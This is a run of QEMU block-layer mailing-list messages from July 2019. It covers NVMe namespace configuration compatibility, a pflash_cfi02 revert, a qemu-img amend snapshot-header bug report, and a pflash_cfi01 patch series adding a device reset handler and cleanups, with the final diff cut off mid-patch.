> > >   -device nvme-ns,drive=disk2,bus=nvme0,nsid=2
> > > 
> > > A maximum of 256 namespaces can be configured.
> > > 
> >  
> > Well that was embarrasing.
> > 
> > This patch breaks nvme-test.c. Which I obviously did not run.
> > 
> > In my defense, the test doesn't do much currently, but I'll of course
> > fix the test for v2.
> 
> That highlights a more serious problem.  This series changes the syntx
> for configuring the nvme device in a way that is not backwards compatible.
> So anyone who is using QEMU with NVME will be broken when they upgrade
> to the next QEMU release.
> 
> I understand why you wanted to restructure things to have a separate
> nvme-ns device, but there needs to be some backcompat support in there
> for the existing syntax to avoid breaking current users IMHO.
> 
 
Hi Daniel,

I raised this issue previously. I suggested that we keep the drive
property for the nvme device and only accept either that or an nvme-ns
device to be configured (but not both).

That would keep backward compatibilty, but enforce the use of nvme-ns
for any setup that requires multiple namespaces.

Would that work?

Cheers,
Klaus

[Qemu-block] [PATCH-for-4.1] Revert "hw/block/pflash_cfi02: Reduce I/O accesses to 16-bit"

2019-07-05 Thread Philippe Mathieu-Daudé

Stephen Checkoway noticed commit 3ae0343db69 is incorrect.
This commit state all parallel flashes are limited to 16-bit
accesses, however the x32 configuration exists in some models,
such the Cypress S29CL032J, which CFI Device Geometry Definition
announces:

  CFI ADDR DATA
  0x28,0x29 = 0x0003 (x32-only asynchronous interface)

Guests should not be affected by the previous change, because
QEMU does not announce itself as x32 capable:

/* Flash device interface (8 & 16 bits) */
pfl->cfi_table[0x28] = 0x02;
pfl->cfi_table[0x29] = 0x00;

Commit 3ae0343db69 does not restrict the bus to 16-bit accesses,
but restrict the implementation as 16-bit access max, so a guest
32-bit access will result in 2x 16-bit calls.

Now, we have 2 boards that register the flash device in 32-bit
access:

- PPC: taihu_405ep

  The CFI id matches the S29AL008J that is a 1MB in x16, while
  the code QEMU forces it to be 2MB, and checking Linux it expects
  a 4MB flash.

- ARM: Digic4

  While the comment says "Samsung K8P3215UQB 64M Bit (4Mx16)",
  this flash is 32Mb (2MB). Also note the CFI id does not match
  the comment.

To avoid unexpected side effect, we revert commit 3ae0343db69,
and will clean the board code later.

Reported-by: Stephen Checkoway 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi02.c | 5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/hw/block/pflash_cfi02.c b/hw/block/pflash_cfi02.c
index 5392290c72..83084b9d72 100644
--- a/hw/block/pflash_cfi02.c
+++ b/hw/block/pflash_cfi02.c
@@ -317,6 +317,8 @@ static uint64_t pflash_read(void *opaque, hwaddr offset, 
unsigned int width)
 boff = offset & 0xFF;
 if (pfl->width == 2) {
 boff = boff >> 1;
+} else if (pfl->width == 4) {
+boff = boff >> 2;
 }
 switch (pfl->cmd) {
 default:
@@ -447,6 +449,8 @@ static void pflash_write(void *opaque, hwaddr offset, 
uint64_t value,
 boff = offset;
 if (pfl->width == 2) {
 boff = boff >> 1;
+} else if (pfl->width == 4) {
+boff = boff >> 2;
 }
 /* Only the least-significant 11 bits are used in most cases. */
 boff &= 0x7FF;
@@ -706,7 +710,6 @@ static void pflash_write(void *opaque, hwaddr offset, 
uint64_t value,
 static const MemoryRegionOps pflash_cfi02_ops = {
 .read = pflash_read,
 .write = pflash_write,
-.impl.max_access_size = 2,
 .valid.min_access_size = 1,
 .valid.max_access_size = 4,
 .endianness = DEVICE_NATIVE_ENDIAN,
-- 
2.20.1

Re: [Qemu-block] [Qemu-devel] [PATCH for-4.1] qcow2: Allow -o compat=v3 during qemu-img amend

2019-07-05 Thread Eric Blake

On 7/5/19 10:53 AM, Eric Blake wrote:
> On 7/5/19 10:28 AM, Eric Blake wrote:
>> Commit b76b4f60 allowed '-o compat=v3' as an alias for the
>> less-appealing '-o compat=1.1' for 'qemu-img create' since we want to
>> use the QMP form as much as possible, but forgot to do likewise for
>> qemu-img amend.  Also, it doesn't help that '-o help' doesn't list our
>> new preferred spellings.
>>
>> Signed-off-by: Eric Blake 
>> ---
>>
>> I'm arguing that the lack of consistency is a bug, even though the bug
>> has been present since 2.12.
> 
> I found this bug while chasing down another one: trying to see if we can
> now lift our restriction against 'qemu-img resize' on an image with
> internal snapshots.  For v3 images, the limitation is artificial (the
> spec says every snapshot is required to have an associated size, so you
> know what size to change back to when reverting to that snapshot); but
> for v2 the limitation is real (the spec did not require tracking image
> size, and therefore changing the size meant that you might not be able
> to safely revert).  Except that we ALSO have a bug in qemu-img amend:
> 
> 1. Create a v2 file with internal snapshot. On CentOS 6:
> $ qemu-img create -f qcow2 file 1m
> $ qemu-img snapshot -c s1 file
> 2. Check that the internal snapshot header uses the smaller size:
> $ od -Ax -j64 -N8 -tx1 file  # Learn the offset for the next command
> $ offset=$((0x5+36))
> $ od -Ax -j$offset -N 4 -tx1 file
>  => extra field is 0
> 3. Upgrade it to v3. Using qemu.git master:
> $ qemu-img amend -o compat=1.1 file
> 4. Check the internal snapshot header size:
> $ od -Ax -j64 -N8 -tx1 file  # Learn the offset for the next command
> $ offset=$((0x5+36))
> $ od -Ax -j$offset -N 4 -tx1 file
>  => oops - extra field is still 0, but should now be at least 16.
> 


Oh, and 'qemu-img check file' fails to diagnose the v3 image as
violating the qcow2 spec.

-- 
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3226
Virtualization:  qemu.org | libvirt.org



signature.asc
Description: OpenPGP digital signature

Re: [Qemu-block] [Qemu-devel] [PATCH for-4.1] qcow2: Allow -o compat=v3 during qemu-img amend

2019-07-05 Thread Eric Blake

On 7/5/19 10:28 AM, Eric Blake wrote:
> Commit b76b4f60 allowed '-o compat=v3' as an alias for the
> less-appealing '-o compat=1.1' for 'qemu-img create' since we want to
> use the QMP form as much as possible, but forgot to do likewise for
> qemu-img amend.  Also, it doesn't help that '-o help' doesn't list our
> new preferred spellings.
> 
> Signed-off-by: Eric Blake 
> ---
> 
> I'm arguing that the lack of consistency is a bug, even though the bug
> has been present since 2.12.

I found this bug while chasing down another one: trying to see if we can
now lift our restriction against 'qemu-img resize' on an image with
internal snapshots.  For v3 images, the limitation is artificial (the
spec says every snapshot is required to have an associated size, so you
know what size to change back to when reverting to that snapshot); but
for v2 the limitation is real (the spec did not require tracking image
size, and therefore changing the size meant that you might not be able
to safely revert).  Except that we ALSO have a bug in qemu-img amend:

1. Create a v2 file with internal snapshot. On CentOS 6:
$ qemu-img create -f qcow2 file 1m
$ qemu-img snapshot -c s1 file
2. Check that the internal snapshot header uses the smaller size:
$ od -Ax -j64 -N8 -tx1 file  # Learn the offset for the next command
$ offset=$((0x5+36))
$ od -Ax -j$offset -N 4 -tx1 file
 => extra field is 0
3. Upgrade it to v3. Using qemu.git master:
$ qemu-img amend -o compat=1.1 file
4. Check the internal snapshot header size:
$ od -Ax -j64 -N8 -tx1 file  # Learn the offset for the next command
$ offset=$((0x5+36))
$ od -Ax -j$offset -N 4 -tx1 file
 => oops - extra field is still 0, but should now be at least 16.

-- 
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3226
Virtualization:  qemu.org | libvirt.org

signature.asc
Description: OpenPGP digital signature

[Qemu-block] [PATCH v3 9/9] hw/block/pflash_cfi01: Hold the PRI table offset in a variable

2019-07-05 Thread Philippe Mathieu-Daudé

Manufacturers are allowed to move the PRI table, this is why the
offset is queryable via fixed offsets 0x15/0x16.
Add a variable to hold the offset, so it will be easier to later
move the PRI table.

Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 41 ++---
 1 file changed, 26 insertions(+), 15 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index ab72af22a7..67e714b32d 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -761,6 +761,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 }
 
 /* Hardcoded CFI table */
+const uint16_t pri_ofs = 0x31;
 /* Standard "QRY" string */
 pfl->cfi_table[0x10] = 'Q';
 pfl->cfi_table[0x11] = 'R';
@@ -769,14 +770,17 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->cfi_table[0x13] = 0x01;
 pfl->cfi_table[0x14] = 0x00;
 /* Primary extended table address (none) */
-pfl->cfi_table[0x15] = 0x31;
-pfl->cfi_table[0x16] = 0x00;
+pfl->cfi_table[0x15] = pri_ofs;
+pfl->cfi_table[0x16] = pri_ofs >> 8;
 /* Alternate command set (none) */
 pfl->cfi_table[0x17] = 0x00;
 pfl->cfi_table[0x18] = 0x00;
 /* Alternate extended table (none) */
 pfl->cfi_table[0x19] = 0x00;
 pfl->cfi_table[0x1A] = 0x00;
+
+/* CFI: System Interface Information */
+
 /* Vcc min */
 pfl->cfi_table[0x1B] = 0x45;
 /* Vcc max */
@@ -801,6 +805,9 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->cfi_table[0x25] = 0x04;
 /* Max timeout for chip erase */
 pfl->cfi_table[0x26] = 0x00;
+
+/* CFI: Device Geometry Definition */
+
 /* Device size */
 pfl->cfi_table[0x27] = ctz32(device_len); /* + 1; */
 /* Flash device interface (8 & 16 bits) */
@@ -825,26 +832,30 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->cfi_table[0x2E] = (blocks_per_device - 1) >> 8;
 pfl->cfi_table[0x2F] = sector_len_per_device >> 8;
 pfl->cfi_table[0x30] = sector_len_per_device >> 16;
+assert(0x30 < pri_ofs);
+
+/* CFI: Primary-Vendor Specific */
 
 /* Extended */
-pfl->cfi_table[0x31] = 'P';
-pfl->cfi_table[0x32] = 'R';
-pfl->cfi_table[0x33] = 'I';
+pfl->cfi_table[0x00 + pri_ofs] = 'P';
+pfl->cfi_table[0x01 + pri_ofs] = 'R';
+pfl->cfi_table[0x02 + pri_ofs] = 'I';
 
-pfl->cfi_table[0x34] = '1';
-pfl->cfi_table[0x35] = '0';
+pfl->cfi_table[0x03 + pri_ofs] = '1';
+pfl->cfi_table[0x04 + pri_ofs] = '0';
 
-pfl->cfi_table[0x36] = 0x00;
-pfl->cfi_table[0x37] = 0x00;
-pfl->cfi_table[0x38] = 0x00;
-pfl->cfi_table[0x39] = 0x00;
+pfl->cfi_table[0x05 + pri_ofs] = 0x00; /* Optional features */
+pfl->cfi_table[0x06 + pri_ofs] = 0x00;
+pfl->cfi_table[0x07 + pri_ofs] = 0x00;
+pfl->cfi_table[0x08 + pri_ofs] = 0x00;
 
-pfl->cfi_table[0x3a] = 0x00;
+pfl->cfi_table[0x09 + pri_ofs] = 0x00; /* Func. supported after suspend */
 
-pfl->cfi_table[0x3b] = 0x00;
-pfl->cfi_table[0x3c] = 0x00;
+pfl->cfi_table[0x0a + pri_ofs] = 0x00; /* Block status register mask */
+pfl->cfi_table[0x0b + pri_ofs] = 0x00;
 
-pfl->cfi_table[0x3f] = 0x01; /* Number of protection fields */
+pfl->cfi_table[0x0e + pri_ofs] = 0x01; /* Number of protection fields */
+assert(0x0e + pri_ofs < ARRAY_SIZE(pfl->cfi_table));
 }
 
 static void pflash_cfi01_system_reset(DeviceState *dev)
-- 
2.20.1

[Qemu-block] [PATCH v3 8/9] hw/block/pflash_cfi01: Replace DPRINTF by qemu_log_mask(GUEST_ERROR)

2019-07-05 Thread Philippe Mathieu-Daudé

Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 8 ++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index ba00e52923..ab72af22a7 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -283,7 +283,9 @@ static uint32_t pflash_read(PFlashCFI01 *pfl, hwaddr offset,
 switch (pfl->cmd) {
 default:
 /* This should never happen : reset state & treat it as a read */
-DPRINTF("%s: unknown command state: %x\n", __func__, pfl->cmd);
+qemu_log_mask(LOG_GUEST_ERROR, "%s: Invalid state, "
+  "wcycle %d cmd 0x02%x\n",
+  __func__, pfl->wcycle, pfl->cmd);
 pfl->wcycle = 0;
 pfl->cmd = 0xff;
 /* fall through to read code */
@@ -630,7 +632,9 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 break;
 default:
 /* Should never happen */
-DPRINTF("%s: invalid write state\n",  __func__);
+qemu_log_mask(LOG_GUEST_ERROR, "%s: Invalid state, "
+  "wcycle %d cmd (0x02%x -> value 0x02%x)\n",
+  __func__, pfl->wcycle, pfl->cmd, value);
 goto mode_read_array;
 }
 return;
-- 
2.20.1

[Qemu-block] [PATCH v3 7/9] hw/block/pflash_cfi01: Improve command comments

2019-07-05 Thread Philippe Mathieu-Daudé

Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 16 
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index e097d9260d..ba00e52923 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -208,11 +208,11 @@ static uint32_t pflash_devid_query(PFlashCFI01 *pfl, 
hwaddr offset)
  * Offsets 2/3 are block lock status, is not emulated.
  */
 switch (boff & 0xFF) {
-case 0:
+case 0: /* Manufacturer ID */
 resp = pfl->ident0;
 trace_pflash_manufacturer_id(resp);
 break;
-case 1:
+case 1: /* Device ID */
 resp = pfl->ident1;
 trace_pflash_device_id(resp);
 break;
@@ -455,11 +455,11 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 case 0:
 /* read mode */
 switch (cmd) {
-case 0x10: /* Single Byte Program */
-case 0x40: /* Single Byte Program */
+case 0x10: /* Single Byte Program (setup) */
+case 0x40: /* Single Byte Program (setup) [Intel] */
 DPRINTF("%s: Single Byte Program\n", __func__);
 break;
-case 0x20: /* Block erase */
+case 0x20: /* Block erase (setup) */
 p = pfl->storage;
 offset &= ~(pfl->sector_len - 1);
 
@@ -515,8 +515,8 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 break;
 case 1:
 switch (pfl->cmd) {
-case 0x10: /* Single Byte Program */
-case 0x40: /* Single Byte Program */
+case 0x10: /* Single Byte Program (confirm) */
+case 0x40: /* Single Byte Program (confirm) [Intel] */
 DPRINTF("%s: Single Byte Program\n", __func__);
 if (!pfl->ro) {
 pflash_data_write(pfl, offset, value, width, be);
@@ -527,7 +527,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 pfl->status |= 0x80; /* Ready! */
 pfl->wcycle = 0;
 break;
-case 0x20: /* Block erase */
+case 0x20: /* Block erase (confirm) */
 case 0x28:
 if (cmd == 0xd0) { /* confirm */
 pfl->wcycle = 0;
-- 
2.20.1

[Qemu-block] [PATCH v3 6/9] hw/block/pflash_cfi01: Simplify CFI_QUERY processing

2019-07-05 Thread Philippe Mathieu-Daudé

The current code does:

if (write_cycle == 0)
  if (command == CFI_QUERY)
break
  write_cycle += 1
  last_command = command

if (write_cycle == 1)
  if (last_command == CFI_QUERY)
if (command == READ_ARRAY
  write_cycle = 0
  last_command = READ_ARRAY

Simplify by not increasing the write_cycle on CFI_QUERY,
the next command are processed as normal wcycle=0.

This matches the hardware datasheet (we do not enter the WRITE
state machine, thus no write cycle involved).

Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 10 ++
 1 file changed, 2 insertions(+), 8 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index c32c67d01d..e097d9260d 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -491,7 +491,8 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 return;
 case 0x98: /* CFI query */
 DPRINTF("%s: CFI query\n", __func__);
-break;
+pfl->cmd = cmd;
+return;
 case 0xe8: /* Write to buffer */
 DPRINTF("%s: Write to buffer\n", __func__);
 /* FIXME should save @offset, @width for case 1+ */
@@ -565,13 +566,6 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 goto mode_read_array;
 }
 break;
-case 0x98:
-if (cmd == 0xff) {
-goto mode_read_array;
-} else {
-DPRINTF("%s: leaving query mode\n", __func__);
-}
-break;
 default:
 goto error_flash;
 }
-- 
2.20.1

[Qemu-block] [PATCH v3 5/9] hw/block/pflash_cfi01: Add the DeviceReset() handler

2019-07-05 Thread Philippe Mathieu-Daudé

A "system reset" sets the device state machine in READ_ARRAY mode
and, after some delay, set the SR.7 READY bit.

We do not model timings, so we set the SR.7 bit directly.

The TYPE_DEVICE interface provides a DeviceReset handler.
This pflash device is a subclass of TYPE_SYS_BUS_DEVICE (which
is a subclass of TYPE_DEVICE).
SYS_BUS devices are automatically plugged into the 'main system
bus', which is the root of the qbus tree.
Devices in the qbus tree are guaranteed to have their reset()
handler called after realize() and before we try to run the guest.

To avoid incoherent states when the machine resets (see but report
below), factor out the reset code into pflash_cfi01_system_reset,
and register the method as a device reset callback.

Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1678713
Reported-by: Laszlo Ersek 
Reviewed-by: John Snow 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
v3: reword description
---
 hw/block/pflash_cfi01.c | 15 +--
 1 file changed, 13 insertions(+), 2 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index 200bfd0ab8..c32c67d01d 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -762,8 +762,6 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->max_device_width = pfl->device_width;
 }
 
-pflash_mode_read_array(pfl);
-pfl->status = 0x80; /* WSM ready */
 /* Hardcoded CFI table */
 /* Standard "QRY" string */
 pfl->cfi_table[0x10] = 'Q';
@@ -851,6 +849,18 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->cfi_table[0x3f] = 0x01; /* Number of protection fields */
 }
 
+static void pflash_cfi01_system_reset(DeviceState *dev)
+{
+PFlashCFI01 *pfl = PFLASH_CFI01(dev);
+
+pflash_mode_read_array(pfl);
+/*
+ * The WSM ready timer occurs at most 150ns after system reset.
+ * This model deliberately ignores this delay.
+ */
+pfl->status = 0x80;
+}
+
 static Property pflash_cfi01_properties[] = {
 DEFINE_PROP_DRIVE("drive", PFlashCFI01, blk),
 /* num-blocks is the number of blocks actually visible to the guest,
@@ -895,6 +905,7 @@ static void pflash_cfi01_class_init(ObjectClass *klass, 
void *data)
 {
 DeviceClass *dc = DEVICE_CLASS(klass);
 
+dc->reset = pflash_cfi01_system_reset;
 dc->realize = pflash_cfi01_realize;
 dc->props = pflash_cfi01_properties;
 dc->vmsd = _pflash;
-- 
2.20.1

[Qemu-block] [PATCH v3 3/9] hw/block/pflash_cfi01: Extract pflash_mode_read_array()

2019-07-05 Thread Philippe Mathieu-Daudé

The same pattern is used when setting the flash in READ_ARRAY mode:
- Set the state machine command to READ_ARRAY
- Reset the write_cycle counter
- Reset the memory region in ROMD

Refactor the current code by extracting this pattern.
It is used twice:
- On a write access (on command failure, error, or explicitly asked)
- When the device is initialized. Here the ROMD mode is hidden
  by the memory_region_init_rom_device() call.

Rename the 'reset_flash' as 'mode_read_array' to make explicit we
do not reset the device, we simply set its internal state machine
in the READ_ARRAY mode. We do not reset the status register error
bits, as a device reset would do.

Reviewed-by: John Snow 
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 36 
 hw/block/trace-events   |  1 +
 2 files changed, 21 insertions(+), 16 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index 58cbef0588..81fbdbde7f 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -112,6 +112,14 @@ static const VMStateDescription vmstate_pflash = {
 }
 };
 
+static void pflash_mode_read_array(PFlashCFI01 *pfl)
+{
+trace_pflash_mode_read_array();
+pfl->cmd = 0xff; /* Read Array */
+pfl->wcycle = 0;
+memory_region_rom_device_set_romd(>mem, true);
+}
+
 /* Perform a CFI query based on the bank width of the flash.
  * If this code is called we know we have a device_width set for
  * this flash.
@@ -469,7 +477,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 case 0x50: /* Clear status bits */
 DPRINTF("%s: Clear status bits\n", __func__);
 pfl->status = 0x0;
-goto reset_flash;
+goto mode_read_array;
 case 0x60: /* Block (un)lock */
 DPRINTF("%s: Block unlock\n", __func__);
 break;
@@ -494,10 +502,10 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 break;
 case 0xf0: /* Probe for AMD flash */
 DPRINTF("%s: Probe for AMD flash\n", __func__);
-goto reset_flash;
+goto mode_read_array;
 case 0xff: /* Read array mode */
 DPRINTF("%s: Read array mode\n", __func__);
-goto reset_flash;
+goto mode_read_array;
 default:
 goto error_flash;
 }
@@ -524,7 +532,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 pfl->wcycle = 0;
 pfl->status |= 0x80;
 } else if (cmd == 0xff) { /* Read Array */
-goto reset_flash;
+goto mode_read_array;
 } else
 goto error_flash;
 
@@ -551,15 +559,15 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 pfl->wcycle = 0;
 pfl->status |= 0x80;
 } else if (cmd == 0xff) { /* read array mode */
-goto reset_flash;
+goto mode_read_array;
 } else {
 DPRINTF("%s: Unknown (un)locking command\n", __func__);
-goto reset_flash;
+goto mode_read_array;
 }
 break;
 case 0x98:
 if (cmd == 0xff) {
-goto reset_flash;
+goto mode_read_array;
 } else {
 DPRINTF("%s: leaving query mode\n", __func__);
 }
@@ -619,7 +627,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 " the data is already written to storage!\n"
 "Flash device reset into READ mode.\n",
 __func__);
-goto reset_flash;
+goto mode_read_array;
 }
 break;
 default:
@@ -629,7 +637,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 default:
 /* Should never happen */
 DPRINTF("%s: invalid write state\n",  __func__);
-goto reset_flash;
+goto mode_read_array;
 }
 return;
 
@@ -638,11 +646,8 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
   "(offset " TARGET_FMT_plx ", wcycle 0x%x cmd 0x%x value 
0x%x)"
   "\n", __func__, offset, pfl->wcycle, pfl->cmd, value);
 
- reset_flash:
-trace_pflash_reset();
-memory_region_rom_device_set_romd(>mem, true);
-pfl->wcycle = 0;
-pfl->cmd = 0xff;
+ mode_read_array:
+pflash_mode_read_array(pfl);
 }
 
 
@@ -757,8 +762,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->max_device_width = pfl->device_width;
 }
 
-pfl->wcycle = 0;
-pfl->cmd = 0xff;
+pflash_mode_read_array(pfl);
 pfl->status = 0;
 /* Hardcoded CFI table */
 /* Standard "QRY" string */
diff --git a/hw/block/trace-events b/hw/block/trace-events
index 13d1b21dd4..91a8a106c0 100644
--- a/hw/block/trace-events

[Qemu-block] [PATCH v3 0/9] hw/block/pflash_cfi01: Add DeviceReset() handler

2019-07-05 Thread Philippe Mathieu-Daudé

The pflash device lacks a reset() function.
When a machine is resetted, the flash might be in an
inconsistent state, leading to unexpected behavior:
https://bugzilla.redhat.com/show_bug.cgi?id=1678713
Resolve this issue by adding a DeviceReset() handler.

Fix also two minor issues, and clean a bit the codebase.

Since v1: https://lists.gnu.org/archive/html/qemu-devel/2019-05/msg00962.html
- addressed Laszlo review comments

Since v2:
- consider migration (Laszlo, Peter)

$ git backport-diff -u v2
Key:
[] : patches are identical
[] : number of functional differences between upstream/downstream patch
[down] : patch is downstream-only
The flags [FC] indicate (F)unctional and (C)ontextual differences, respectively

001/9:[] [--] 'hw/block/pflash_cfi01: Removed an unused timer'
002/9:[0008] [FC] 'hw/block/pflash_cfi01: Use the correct READ_ARRAY value'
003/9:[] [-C] 'hw/block/pflash_cfi01: Extract pflash_mode_read_array()'
004/9:[] [--] 'hw/block/pflash_cfi01: Start state machine as READY to 
accept commands'
005/9:[] [--] 'hw/block/pflash_cfi01: Add the DeviceReset() handler'
006/9:[] [--] 'hw/block/pflash_cfi01: Simplify CFI_QUERY processing'
007/9:[] [--] 'hw/block/pflash_cfi01: Improve command comments'
008/9:[] [--] 'hw/block/pflash_cfi01: Replace DPRINTF by 
qemu_log_mask(GUEST_ERROR)'
009/9:[] [--] 'hw/block/pflash_cfi01: Hold the PRI table offset in a 
variable'

Functional differences on patch #2 are the 6 lines added for
migration of the 'cmd' field, and the updated commit description.

Regards,

Phil.

Philippe Mathieu-Daudé (9):
  hw/block/pflash_cfi01: Removed an unused timer
  hw/block/pflash_cfi01: Use the correct READ_ARRAY value
  hw/block/pflash_cfi01: Extract pflash_mode_read_array()
  hw/block/pflash_cfi01: Start state machine as READY to accept commands
  hw/block/pflash_cfi01: Add the DeviceReset() handler
  hw/block/pflash_cfi01: Simplify CFI_QUERY processing
  hw/block/pflash_cfi01: Improve command comments
  hw/block/pflash_cfi01: Replace DPRINTF by qemu_log_mask(GUEST_ERROR)
  hw/block/pflash_cfi01: Hold the PRI table offset in a variable

 hw/block/pflash_cfi01.c | 148 ++--
 hw/block/trace-events   |   1 +
 2 files changed, 81 insertions(+), 68 deletions(-)

-- 
2.20.1

[Qemu-block] [PATCH v3 4/9] hw/block/pflash_cfi01: Start state machine as READY to accept commands

2019-07-05 Thread Philippe Mathieu-Daudé

When the state machine is ready to accept command, the bit 7 of
the status register (SR) is set to 1.
The guest polls the status register and check this bit before
writting command to the internal 'Write State Machine' (WSM).

Set SR.7 bit to 1 when the device is created.

There is no migration impact by this change.

Reference: Read Array Flowchart
  "Common Flash Interface (CFI) and Command Sets"
   (Intel Application Note 646)
   Appendix B "Basic Command Set"

Reviewed-by: John Snow 
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
v3: Added migration comment.
---
 hw/block/pflash_cfi01.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index 81fbdbde7f..200bfd0ab8 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -763,7 +763,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 }
 
 pflash_mode_read_array(pfl);
-pfl->status = 0;
+pfl->status = 0x80; /* WSM ready */
 /* Hardcoded CFI table */
 /* Standard "QRY" string */
 pfl->cfi_table[0x10] = 'Q';
-- 
2.20.1

[Qemu-block] [PATCH v3 2/9] hw/block/pflash_cfi01: Use the correct READ_ARRAY value

2019-07-05 Thread Philippe Mathieu-Daudé

In the "Read Array Flowchart" the command has a value of 0xFF.

In the document [*] the "Read Array Flowchart", the READ_ARRAY
command has a value of 0xff.

Use the correct value in the pflash model.

There is no change of behavior in the guest, because:
- when the guest were sending 0xFF, the reset_flash label
  was setting the command value as 0x00
- 0x00 was used internally for READ_ARRAY

To keep migration behaving correctly, we have to increase
the VMState version. When migrating from an older version,
we use the correct command value.

[*] "Common Flash Interface (CFI) and Command Sets"
(Intel Application Note 646)
Appendix B "Basic Command Set"

Reviewed-by: John Snow 
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
v3: Handle migrating the 'cmd' field.

Since Laszlo stated he did not test migration [*], I'm keeping his
test tag, because the change with v2 has no impact in the tests
he ran.

Likewise I'm keeping John and Alistair tags, but I'd like an extra
review for the migration change, thanks!

[*] https://lists.gnu.org/archive/html/qemu-devel/2019-07/msg00679.html
---
 hw/block/pflash_cfi01.c | 23 +--
 1 file changed, 13 insertions(+), 10 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index 9e34fd4e82..58cbef0588 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -100,7 +100,7 @@ static int pflash_post_load(void *opaque, int version_id);
 
 static const VMStateDescription vmstate_pflash = {
 .name = "pflash_cfi01",
-.version_id = 1,
+.version_id = 2,
 .minimum_version_id = 1,
 .post_load = pflash_post_load,
 .fields = (VMStateField[]) {
@@ -277,10 +277,9 @@ static uint32_t pflash_read(PFlashCFI01 *pfl, hwaddr 
offset,
 /* This should never happen : reset state & treat it as a read */
 DPRINTF("%s: unknown command state: %x\n", __func__, pfl->cmd);
 pfl->wcycle = 0;
-pfl->cmd = 0;
+pfl->cmd = 0xff;
 /* fall through to read code */
-case 0x00:
-/* Flash area read */
+case 0xff: /* Read Array */
 ret = pflash_data_read(pfl, offset, width, be);
 break;
 case 0x10: /* Single byte program */
@@ -448,8 +447,6 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 case 0:
 /* read mode */
 switch (cmd) {
-case 0x00: /* ??? */
-goto reset_flash;
 case 0x10: /* Single Byte Program */
 case 0x40: /* Single Byte Program */
 DPRINTF("%s: Single Byte Program\n", __func__);
@@ -526,7 +523,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 if (cmd == 0xd0) { /* confirm */
 pfl->wcycle = 0;
 pfl->status |= 0x80;
-} else if (cmd == 0xff) { /* read array mode */
+} else if (cmd == 0xff) { /* Read Array */
